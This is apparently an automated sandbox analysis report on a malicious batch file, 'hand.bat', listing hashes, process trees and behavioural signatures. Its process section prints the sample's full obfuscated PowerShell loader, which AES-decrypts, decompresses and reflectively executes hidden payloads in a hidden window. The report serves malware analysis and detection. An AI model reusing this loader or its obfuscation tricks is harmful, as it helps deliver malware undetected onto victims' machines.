Analysis
Max time kernel: 5s
Max time network: 11s
Platform: windows10-2004_x64
Resource: win10v2004-20241007-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 19-11-2024 21:24

Tasks
Static task: static1
Behavioral task: behavioral1 (sample: hand.bat, resource: win10v2004-20241007-en)
Behavioral task: behavioral2 (sample: hand.bat, resource: win10ltsc2021-20241023-en)
Behavioral task: behavioral3 (sample: hand.bat, resource: win11-20241007-en)
General
Target: hand.bat
Size: 7.0MB
MD5: 1a013c7ac90b58073895b26cae70def7
SHA1: 60c9c3294fc7ac3d336a478274f62f4818498230
SHA256: 698b1f0a35a76e57adef388612b29902f86f56983c772d7c6c17b4483c2be688
SHA512: c1bbb52e8546b352e041e944d7dfa158d5dc9a51b1628128d345e4a9e708871d7a1f5e59cc44a2c66f8dc9af81ec06e1b5105d5a7292497075564496f3b0ec75
SSDEEP: 49152:vZrlGoT+Xts/LJjeDPnIwT0ZFBZP2x3fLKs0HMb0DprNMiKwPjp9Kw2EdF8d7nrx:Y
Malware Config

Signatures
Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run PowerShell and hide display window.
Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid    Process
    4920   powershell.exe
    4920   powershell.exe
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description               pid    Process
    Token: SeDebugPrivilege   4920   powershell.exe
Suspicious use of WriteProcessMemory (4 IoCs)
  Processes:
    description                          pid    Process    procid_target
    PID 1236 wrote to memory of 4752     1236   cmd.exe    85
    PID 1236 wrote to memory of 4752     1236   cmd.exe    85
    PID 1236 wrote to memory of 4920     1236   cmd.exe    86
    PID 1236 wrote to memory of 4920     1236   cmd.exe    86
Processes
C:\Windows\system32\cmd.exe (PID 1236)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hand.bat"
  Signatures: Suspicious use of WriteProcessMemory
  Child: C:\Windows\system32\cmd.exe (PID 4752)
    Command line: cmd.exe /c echo function iuYgv($leKgl){ $jPJwb=[System.Security.Cryptography.Aes]::Create(); $jPJwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $jPJwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $jPJwb.Key=[System.Convert]::FromBase64String('uEpqIWQRyvODISCHGUQfxzSWFesSqTmCOTn7Muaq1uk='); $jPJwb.IV=[System.Convert]::FromBase64String('II7XtEw/4tOoxMX0yT4prg=='); $kNTLM=$jPJwb.CreateDecryptor(); $whegU=$kNTLM.TransformFinalBlock($leKgl, 0, $leKgl.Length); $kNTLM.Dispose(); $jPJwb.Dispose(); $whegU;}function zpxNq($leKgl){ Invoke-Expression '$kWPKo=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$leKgl);'.Replace('*', ''); Invoke-Expression '$UAPJw=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$SDRXH=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($kWPKo, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $SDRXH.CopyTo($UAPJw); $SDRXH.Dispose(); $kWPKo.Dispose(); $UAPJw.Dispose(); $UAPJw.ToArray();}function efQtH($leKgl,$kxxMo){ Invoke-Expression '$ECSjU=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$leKgl);'.Replace('*', ''); Invoke-Expression '$iUybu=$ECSjU.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$iUybu.*I*n*v*o*k*e*($null, $kxxMo);'.Replace('*', '');}$bdjtW = 'C:\Users\Admin\AppData\Local\Temp\hand.bat';$host.UI.RawUI.WindowTitle = $bdjtW;$sWPvP=[System.IO.File]::ReadAllText($bdjtW).Split([Environment]::NewLine);foreach ($fLYEN in $sWPvP) { if ($fLYEN.StartsWith('ECVXS')) { $GELOT=$fLYEN.Substring(5); break; }}$XQqqI=[string[]]$GELOT.Split('\');Invoke-Expression '$gOc = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$saB = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UaX = zpxNq (iuYgv ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($XQqqI[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');efQtH $gOc $null;efQtH $saB $null;efQtH $UaX (,[string[]] (''));
  Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4920)
    Command line: powershell.exe -WindowStyle Hidden
    Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82